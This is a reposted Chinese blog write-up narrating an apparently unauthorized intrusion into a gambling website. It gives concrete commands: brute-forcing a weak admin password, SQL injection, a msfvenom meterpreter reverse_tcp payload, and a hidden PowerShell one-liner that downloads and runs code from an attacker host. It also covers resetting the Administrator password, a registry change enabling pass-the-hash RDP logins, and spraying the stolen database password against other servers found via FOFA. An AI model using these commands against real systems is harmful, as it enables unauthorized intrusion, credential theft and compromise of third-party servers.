声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
-
前言
闲着无聊,网上随便找了一个菠菜进行简单测试,并做笔记记录,大佬们轻喷,有什么不足之处请指教。 -
弱口令
访问网站就是一个登录页面,没有验证码直接bp开启,成功爆出弱口令admin/123456,直接进入后台。 -
SQL注入获取权限
翻看了很多功能点,在一处功能点发现上传接口,并尝试上传文件,发现无法上传,加了白名单。直接选择放弃,继续寻找。在某一个 参数上加上单引号,直接报错,SQL注入这不就来了么。http:
//url/GroupMember.aspx?gid=
- 上线MSF
已经获取普通权限,接下来就是上线msf提权。msf生成powershell脚本,并放置在网站目录下。msfvenom
-p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=
8888
-f psh-reflection >xx.ps1
powershell.exe -nop -w hidden -
c
"IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))"
如果想要通过url拼接堆叠执行powershell会存在一个问题,就是单引号闭合问题。我们可以通过对powershell进行编码一下,这样就可以绕过单引号的问题。下面推荐一个不错的网站。
https:
/
/r0yanx.com/tools
/java_exec_encode/
迁移一下进程,防止进程掉线。
- 远程登录服务器
发现服务器开启3389端口,因为是system权限,且为2012系统,大于2008版本都是无法抓到明文密码,直接修改adminnistrator密码。(实战中不推荐直接修改管理员密码) - 利用hash远程登录管理员账号
因为是win2012无法获取明文密码,直接修改管理员密码稍有些不妥。尝试通过获取管理员NTLM远程登录机器。(并非同一台,这只是提供一个思路)
REG ADD
"HKLMSystemCurrentControlSetControlLsa"
/v DisableRestrictedAdmin /t REG_DWORD /d
00000000
/f
//开启Restricted Admin mode
REG query
"HKLMSystemCurrentControlSetControlLsa"
| findstr
"DisableRestrictedAdmin"
//查看是否已开启0x0则表示开启
- 其他
前期发现1433端口开放着,寻找数据库配置文件,登录数据库。
通过fofa找了一下,资产还是挺多的,且很多都开放1433端口,猜测会存在同一个人部署的网站,尝试用获取的密码对这些资产的1433端口进行爆破,成功撞到几台数据库,且都是sa权限。结束。
原文链接
https:
//xz.aliyun.com/t/12501
原文始发于微信公众号(湘安无事):记一次某菠菜网站的测试实战
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论